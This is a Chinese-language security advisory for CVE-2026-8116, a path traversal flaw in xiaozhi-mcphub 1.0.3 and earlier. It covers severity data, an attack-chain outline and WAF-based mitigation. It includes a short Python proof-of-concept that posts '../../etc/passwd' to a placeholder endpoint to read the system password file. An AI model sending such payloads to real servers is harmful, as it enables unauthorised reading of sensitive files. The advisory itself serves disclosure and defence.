CVE-2026-8116 xiaozhi-mcphub路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-8116

漏洞类型

路径遍历

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

xiaozhi-mcphub

漏洞概述

xiaozhi-mcphub是huangjunsen0406开发的一个项目。在其1.0.3及之前的版本中，src/controllers/dxtController.ts文件存在一处安全缺陷。该漏洞源于对manifest.name参数的处理不当，导致攻击者可以实施路径遍历攻击。由于该漏洞允许远程发起攻击且利用代码已公开，对系统安全性构成中等风险。目前项目方尚未对此问题做出响应。

技术细节

该漏洞的根本原因位于 `src/controllers/dxtController.ts` 文件中。代码在处理用户请求时，未对 `manifest.name` 参数进行充分的校验或过滤，直接将其用于文件路径操作。攻击者可以通过构造包含特殊字符（如 `../`）的恶意请求，利用该参数操纵底层文件系统路径。这种路径遍历攻击允许攻击者绕过应用程序的目录限制，读取、写入或删除服务器上预期目录之外的文件。由于 CVSS 向量显示攻击复杂度低（AC:L）且无需用户交互（UI:N），攻击者可以轻易地通过网络发起远程攻击。结合已公开的 PoC 代码，未打补丁的系统极易受到自动化攻击工具的侵害。

攻击链分析

STEP 1

步骤1

攻击者通过网络扫描发现目标系统运行的是xiaozhi-mcphub 1.0.3或更早版本。

STEP 2

步骤2

攻击者向src/controllers/dxtController.ts对应的接口发送特制的HTTP请求，在manifest.name参数中注入“../”路径遍历字符。

STEP 3

步骤3

服务器端未过滤该参数，将其直接拼接到文件路径中，导致攻击者访问到Web目录之外的敏感文件（如/etc/passwd）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual vulnerable endpoint)
target_url = "http://target-ip:port/api/path"

# Malicious payload containing path traversal sequence
payload = {
    "manifest.name": "../../etc/passwd" 
}

try:
    # Sending the POST request with the malicious payload
    response = requests.post(target_url, json=payload)
    
    # Checking if the attack was successful
    if response.status_code == 200 and "root:" in response.text:
        print("[+] Vulnerability confirmed! Sensitive file content retrieved.")
        print(response.text)
    else:
        print("[-] Exploit failed or target not vulnerable.")
        print("Status Code:", response.status_code)
        print("Response:", response.text)
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

xiaozhi-mcphub <= 1.0.3

防御指南

临时缓解措施

建议在网络边界部署Web应用防火墙（WAF），配置规则拦截包含路径遍历特征（如"../"，"..%5c"）的请求。若无需使用该功能，可暂时禁用受影响的控制器或限制对特定端口的访问权限，以降低攻击风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8116
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8116
3 Details https://www.cvedetails.com/cve/CVE-2026-8116/
4 VulDB https://vuldb.com/cve/CVE-2026-8116
5 Link https://github.com/huangjunsen0406/xiaozhi-mcphub/
6 Link https://github.com/huangjunsen0406/xiaozhi-mcphub/issues/29
7 Link https://vuldb.com/submit/808260
8 Link https://vuldb.com/vuln/361904
9 Link https://vuldb.com/vuln/361904/cti